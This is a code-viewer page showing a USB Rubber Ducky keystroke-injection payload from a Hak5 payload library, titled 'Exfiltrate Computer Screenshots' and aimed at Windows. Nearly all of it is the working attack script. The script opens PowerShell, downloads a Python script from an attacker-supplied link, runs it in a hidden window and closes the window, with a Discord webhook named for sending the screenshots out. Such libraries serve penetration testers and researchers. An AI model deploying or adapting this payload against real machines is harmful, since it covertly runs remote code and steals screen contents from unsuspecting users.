Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/exfiltration/Exfiltrate Computer Screenshots/payload.txt
2968 views
1
REM ###################################################
2
REM # |
3
REM # Title : Exfiltrate Computer Screenshots |
4
REM # Author : Aleff |
5
REM # Version : 1.0 |
6
REM # Category : Exfiltrate |
7
REM # Target : Windows 10-11 |
8
REM # |
9
REM ###################################################
10
11
12
REM Requirements:
13
REM - Internet Connection
14
REM - Discord Webhook (or whatever you want for the exfiltration)
15
REM - ExecutionPolicy Bypass
16
REM - Python
17
18
19
REM REQUIRED - Set your Python script link
20
DEFINE SCRIPT-PY-LINK example.com
21
22
23
DELAY 1000
24
GUI r
25
DELAY 1000
26
STRING powershell
27
ENTER
28
DELAY 2000
29
30
31
STRING Invoke-WebRequest -Uri "
32
STRING SCRIPT-PY-LINK
33
STRING " -OutFile "script.py"
34
ENTER
35
DELAY 2000
36
37
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
38
DELAY 1000
39
ALT F4
40
41